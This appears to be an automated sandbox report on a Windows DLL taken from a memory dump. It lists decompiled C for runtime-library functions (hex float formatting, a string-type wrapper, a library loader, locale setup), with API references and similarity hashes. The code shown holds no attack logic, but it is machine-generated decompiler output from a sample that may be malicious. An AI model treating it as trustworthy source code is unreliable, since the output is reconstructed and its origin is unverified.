				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E6E1F1F60(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E6E2275C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E6E2275C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E6E1E39C0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E6E2275C0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E6E227640();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E6E227640();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E6E227640();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E6E20F648(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E6E2278B0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E6E202281();
					_t183 = 0x22;
					 *_t129 = _t183;
					E6E20215B();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x6e20f345
0x6e20f350
0x6e20f357
0x6e20f359
0x6e20f359
0x6e20f35b
0x6e20f364
0x6e20f366
0x6e20f36b
0x6e20f371
0x6e20f387
0x6e20f38c
0x6e20f38f
0x6e20f39c
0x6e20f3a1
0x6e20f3f5
0x6e20f3fd
0x6e20f3ff
0x6e20f401
0x6e20f404
0x6e20f404
0x6e20f404
0x6e20f40a
0x6e20f412
0x6e20f425
0x6e20f428
0x6e20f42a
0x6e20f42d
0x6e20f42e
0x6e20f44f
0x6e20f452
0x6e20f452
0x6e20f430
0x6e20f430
0x6e20f432
0x6e20f43d
0x6e20f43d
0x6e20f43f
0x6e20f446
0x6e20f441
0x6e20f441
0x6e20f441
0x6e20f43f
0x6e20f453
0x6e20f455
0x6e20f456
0x6e20f459
0x6e20f45b
0x6e20f465
0x6e20f46f
0x6e20f45d
0x6e20f45d
0x6e20f45d
0x6e20f474
0x6e20f474
0x6e20f479
0x6e20f47c
0x6e20f487
0x6e20f487
0x6e20f487
0x6e20f487
0x6e20f48b
0x6e20f492
0x6e20f493
0x6e20f496
0x6e20f499
0x6e20f499
0x6e20f49b
0x00000000
0x00000000
0x6e20f4b3
0x6e20f4ba
0x6e20f4be
0x6e20f4c1
0x6e20f4c4
0x6e20f4c6
0x6e20f4c6
0x6e20f4c6
0x6e20f4c8
0x6e20f4cb
0x6e20f4ce
0x6e20f4d0
0x6e20f4d8
0x6e20f4de
0x6e20f4e1
0x6e20f4e4
0x6e20f4e5
0x6e20f4e8
0x6e20f4eb
0x6e20f4eb
0x6e20f4f0
0x6e20f4f3
0x00000000
0x00000000
0x6e20f50b
0x6e20f510
0x6e20f514
0x00000000
0x00000000
0x6e20f518
0x6e20f51b
0x6e20f51c
0x6e20f51c
0x6e20f51e
0x6e20f521
0x00000000
0x00000000
0x6e20f523
0x6e20f526
0x6e20f52d
0x6e20f530
0x6e20f533
0x6e20f549
0x6e20f549
0x6e20f549
0x6e20f535
0x6e20f535
0x6e20f537
0x6e20f53a
0x6e20f545
0x6e20f53c
0x6e20f53f
0x6e20f53f
0x6e20f53a
0x00000000
0x6e20f533
0x6e20f528
0x6e20f528
0x6e20f52a
0x6e20f52a
0x6e20f47e
0x6e20f47e
0x6e20f481
0x6e20f54c
0x6e20f54c
0x6e20f54e
0x6e20f550
0x6e20f553
0x6e20f554
0x6e20f555
0x6e20f556
0x6e20f55e
0x6e20f55e
0x6e20f55e
0x6e20f560
0x6e20f563
0x6e20f566
0x6e20f568
0x6e20f568
0x6e20f56a
0x6e20f57c
0x6e20f580
0x6e20f583
0x6e20f58a
0x6e20f592
0x6e20f592
0x6e20f595
0x6e20f597
0x6e20f5a8
0x6e20f5a8
0x6e20f5ac
0x6e20f5ac
0x6e20f5af
0x6e20f5b1
0x6e20f5b4
0x00000000
0x6e20f599
0x6e20f599
0x6e20f59f
0x6e20f59f
0x6e20f5a3
0x6e20f5b6
0x6e20f5b6
0x6e20f5ba
0x6e20f5bb
0x6e20f5bd
0x6e20f5bf
0x6e20f600
0x6e20f600
0x6e20f602
0x6e20f60f
0x6e20f60f
0x6e20f611
0x6e20f613
0x6e20f614
0x6e20f615
0x6e20f61c
0x6e20f61f
0x6e20f621
0x6e20f621
0x6e20f622
0x6e20f624
0x6e20f627
0x6e20f627
0x6e20f629
0x6e20f62b
0x00000000
0x6e20f62b
0x6e20f604
0x6e20f606
0x00000000
0x00000000
0x6e20f608
0x00000000
0x00000000
0x6e20f60a
0x6e20f60d
0x00000000
0x00000000
0x00000000
0x6e20f60d
0x6e20f5c6
0x6e20f5cc
0x6e20f5cc
0x6e20f5ce
0x6e20f5cf
0x6e20f5d0
0x6e20f5d1
0x6e20f5d8
0x6e20f5db
0x6e20f5dd
0x6e20f5de
0x6e20f5e0
0x6e20f5ed
0x6e20f5ed
0x6e20f5ef
0x6e20f5f1
0x6e20f5f2
0x6e20f5f3
0x6e20f5fa
0x6e20f5fd
0x6e20f5ff
0x6e20f5ff
0x00000000
0x6e20f5ff
0x6e20f5e2
0x6e20f5e2
0x6e20f5e4
0x00000000
0x00000000
0x6e20f5e6
0x00000000
0x00000000
0x6e20f5e8
0x6e20f5eb
0x00000000
0x00000000
0x00000000
0x6e20f5eb
0x6e20f5c8
0x6e20f5ca
0x00000000
0x00000000
0x00000000
0x6e20f5ca
0x6e20f59b
0x6e20f59d
0x00000000
0x00000000
0x00000000
0x6e20f59d
0x6e20f597
0x00000000
0x6e20f481
0x6e20f47c
0x6e20f3a3
0x6e20f3a5
0x00000000
0x6e20f3a7
0x6e20f3bd
0x6e20f3c2
0x6e20f3c4
0x6e20f3d0
0x6e20f3d6
0x6e20f3d7
0x6e20f3d9
0x6e20f3db
0x6e20f3e6
0x6e20f3e6
0x6e20f3e9
0x6e20f3eb
0x6e20f3eb
0x6e20f3ee
0x6e20f3c6
0x6e20f3c6
0x6e20f3c6
0x00000000
0x6e20f3c4
0x6e20f373
0x6e20f373
0x6e20f37a
0x6e20f37b
0x6e20f37d
0x6e20f62f
0x6e20f633
0x6e20f638
0x6e20f638
0x6e20f647
0x6e20f647

APIs

_strrchr.LIBCMT ref: 6E20F3D0
__alldvrm.LIBCMT ref: 6E20F5D1
__alldvrm.LIBCMT ref: 6E20F5F3

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction ID: d759fa54c56c1364d42419361a8a0384893c51045b3d0ea6dcad755a8202193e
Opcode Fuzzy Hash: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction Fuzzy Hash: E8A14572A9428B9FF711CFA8C8907ABBFA6EF45314F2441A9D9949B2C1C7348941C758

Uniqueness

Uniqueness Score: -1.00%

Function 6E216102, Relevance: 6.1, APIs: 4, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6E216102(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t68;
				signed int _t69;
				short* _t70;

				_t65 = __edx;
				_t34 =  *0x6e28506c; // 0x9881d723
				_v8 = _t34 ^ _t69;
				E6E1F1F60(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0xc0b0a09
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E6E1DF8A5(_v8 ^ _t69, _t65, _t68);
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t68 = 0;
					L11:
					if(_t68 != 0) {
						E6E1E39C0(_t67, _t68, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t68, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t68, _t46, _a20);
						}
					}
					L14:
					E6E1CDEE1(_t68);
					goto L15;
				}
				_t20 = _t55 + 8; // 0xc
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t55 + 8; // 0xc
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t68 = E6E20F26D(_t63, _t48 & _t63);
					if(_t68 == 0) {
						goto L14;
					}
					 *_t68 = 0xdddd;
					L9:
					_t68 =  &(_t68[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E6E1E01B0();
				_t68 = _t70;
				if(_t68 == 0) {
					goto L14;
				}
				 *_t68 = 0xcccc;
				goto L9;
			}

0x6e216102
0x6e21610a
0x6e216111
0x6e21611d
0x6e216122
0x6e216127
0x6e21612c
0x6e21612c
0x6e21612f
0x6e216131
0x6e216131
0x6e216136
0x6e21614f
0x6e216155
0x6e21615a
0x6e2161f9
0x6e2161fd
0x6e216202
0x6e216202
0x6e21621e
0x6e21621e
0x6e216160
0x6e216163
0x6e216168
0x6e21616c
0x6e2161b8
0x6e2161ba
0x6e2161bc
0x6e2161c1
0x6e2161d8
0x6e2161e0
0x6e2161f0
0x6e2161f0
0x6e2161e0
0x6e2161f2
0x6e2161f3
0x00000000
0x6e2161f8
0x6e21616e
0x6e216173
0x6e216175
0x6e216177
0x6e216177
0x6e21617f
0x6e21619c
0x6e2161a6
0x6e2161ab
0x00000000
0x00000000
0x6e2161ad
0x6e2161b3
0x6e2161b3
0x00000000
0x6e2161b3
0x6e216183
0x6e216187
0x6e21618c
0x6e216190
0x00000000
0x00000000
0x6e216192
0x00000000

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,6E230EA8,00000000,00000000,008B018B,6E20DA1E,?,00000004,00000001,6E230EA8,0000007F,?,008B018B,00000001), ref: 6E21614F
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E2161D8
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E2161EA
__freea.LIBCMT ref: 6E2161F3

Part of subcall function 6E20F26D: RtlAllocateHeap.NTDLL(00000000,6E1C75D9,00000000,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9,00000004,00000000,00000000,00000000), ref: 6E20F29F

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: c952fcd61241193bdbb7c107878c4bd25e005f2ef3961c9aff51065ccf297142
Instruction ID: 313a0dff0af59cffe074e0cbc09540bf81cb6fb413a2bcaa9bbd01627d439ec2
Opcode Fuzzy Hash: c952fcd61241193bdbb7c107878c4bd25e005f2ef3961c9aff51065ccf297142
Instruction Fuzzy Hash: 5D31CD72A1021BAFDF14CFA4CC84DEF3BAAEB40714F084568ED14D6251EB35CA95CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E213E7F, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6E213E7F(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x6e287908 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x6e231690 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x9881d724
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x6e213e84
0x6e213e88
0x6e213e8f
0x6e213e93
0x6e213ea1
0x6e213eb7
0x6e213ebb
0x6e213ee4
0x6e213ee6
0x6e213eea
0x6e213eed
0x6e213eed
0x6e213ef3
0x6e213ef5
0x00000000
0x6e213ef6
0x6e213ebd
0x6e213ec6
0x6e213ed5
0x6e213ec8
0x6e213ecb
0x6e213ed1
0x6e213ed1
0x6e213ed9
0x00000000
0x6e213edb
0x6e213ede
0x6e213ee0
0x00000000
0x6e213ee0
0x6e213ed9
0x6e213e95
0x6e213e9a
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6E213E26,?,00000000,00000000,00000000,?,6E2141BD,00000006,FlsSetValue), ref: 6E213EB1
GetLastError.KERNEL32(?,6E213E26,?,00000000,00000000,00000000,?,6E2141BD,00000006,FlsSetValue,6E231C58,FlsSetValue,00000000,00000364,?,6E20D6D1), ref: 6E213EBD
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6E213E26,?,00000000,00000000,00000000,?,6E2141BD,00000006,FlsSetValue,6E231C58,FlsSetValue,00000000), ref: 6E213ECB

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 437c17e0f59cbf3e74be3753f95f61e08cae6bf20981328e54affb5b95798733
Instruction ID: 5e8c07c179483aad5171b3e6edcb8e5f2ac0097f718acaa34ae9884cbdbf6595
Opcode Fuzzy Hash: 437c17e0f59cbf3e74be3753f95f61e08cae6bf20981328e54affb5b95798733
Instruction Fuzzy Hash: AA01B53226D72B9FCB2149A98C4D98677DBBF167B1B160520EA05D3540D721D900CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D14EC, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6E1D14EC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6E1E00AC(0x6e228a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6E1DF8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6E1A1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6E1A1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6E1D0110( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6E1A14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6E1E0075(_t15);
			}

0x6e1d14f3
0x6e1d14f8
0x6e1d14fb
0x6e1d14fd
0x6e1d14ff
0x6e1d1504
0x6e1d1506
0x6e1d1508
0x6e1d150a
0x6e1d150c
0x6e1d1512
0x6e1d1515
0x6e1d151a
0x6e1d1524
0x6e1d1528
0x6e1d1530
0x6e1d1531
0x6e1d1532
0x6e1d1533
0x6e1d1536
0x6e1d153e
0x6e1d153e
0x6e1d1540
0x6e1d1545
0x6e1d154a
0x6e1d154a
0x6e1d1545
0x6e1d1508
0x6e1d1551
0x6e1d1557

APIs

__EH_prolog3.LIBCMT ref: 6E1D14F3
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E1D1528

Part of subcall function 6E1A1450: __EH_prolog3.LIBCMT ref: 6E1A1457
Part of subcall function 6E1A1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A1464
Part of subcall function 6E1A1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1A14A1

numpunct.LIBCPMT ref: 6E1D1539

Part of subcall function 6E1D0110: __EH_prolog3.LIBCMT ref: 6E1D0117

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E1D154A

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: ebd30df0bdb3bbe63814933ccd400071cff4c04da911ab9539e1c4b1df7954cd
Instruction ID: 53d331131ba17ee63f7f5e838253dba2ed86069bce952739994989efe6e1f952
Opcode Fuzzy Hash: ebd30df0bdb3bbe63814933ccd400071cff4c04da911ab9539e1c4b1df7954cd
Instruction Fuzzy Hash: 9E0181B5B4021A9FDB01CBECC850AEEBB79AF14794F20051AE515AB280DF748AC9D791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D1558, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6E1D1558(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t15;
				intOrPtr _t17;
				void* _t20;
				intOrPtr* _t32;
				void* _t35;

				E6E1E00AC(0x6e228a31, __ebx, __edi, __esi, 0x3c);
				_t32 =  *((intOrPtr*)(_t35 + 8));
				_t34 = 0;
				_t23 = 0;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				if(_t32 != 0) {
					_t37 =  *_t32;
					if( *_t32 == 0) {
						_push(0x44);
						_t17 = E6E1DF8B6(__edx, 0, _t37);
						 *((intOrPtr*)(_t35 - 0x14)) = _t17;
						 *((intOrPtr*)(_t35 - 4)) = 0;
						if(_t17 != 0) {
							_push(E6E1A1703( *((intOrPtr*)(_t35 + 0xc))));
							_t20 = E6E1A1450(0, _t35 - 0x48, __edx, _t32, 0);
							_t23 = 1;
							_push(0);
							_push(_t20);
							 *((char*)(_t35 - 4)) = 1;
							 *((intOrPtr*)(_t35 - 0x10)) = 1;
							_t34 = E6E1D0143( *((intOrPtr*)(_t35 - 0x14)), 0);
						}
						 *_t32 = _t34;
						if((_t23 & 0x00000001) != 0) {
							E6E1A14CE(_t35 - 0x48);
						}
					}
				}
				_t15 = 5;
				return E6E1E0075(_t15);
			}

0x6e1d155f
0x6e1d1564
0x6e1d1567
0x6e1d1569
0x6e1d156b
0x6e1d1570
0x6e1d1572
0x6e1d1574
0x6e1d1576
0x6e1d1578
0x6e1d157e
0x6e1d1581
0x6e1d1586
0x6e1d1590
0x6e1d1594
0x6e1d159c
0x6e1d159d
0x6e1d159e
0x6e1d159f
0x6e1d15a2
0x6e1d15aa
0x6e1d15aa
0x6e1d15ac
0x6e1d15b1
0x6e1d15b6
0x6e1d15b6
0x6e1d15b1
0x6e1d1574
0x6e1d15bd
0x6e1d15c3

APIs

__EH_prolog3.LIBCMT ref: 6E1D155F
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E1D1594

Part of subcall function 6E1A1450: __EH_prolog3.LIBCMT ref: 6E1A1457
Part of subcall function 6E1A1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A1464
Part of subcall function 6E1A1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1A14A1

numpunct.LIBCPMT ref: 6E1D15A5

Part of subcall function 6E1D0143: __EH_prolog3.LIBCMT ref: 6E1D014A

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E1D15B6

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
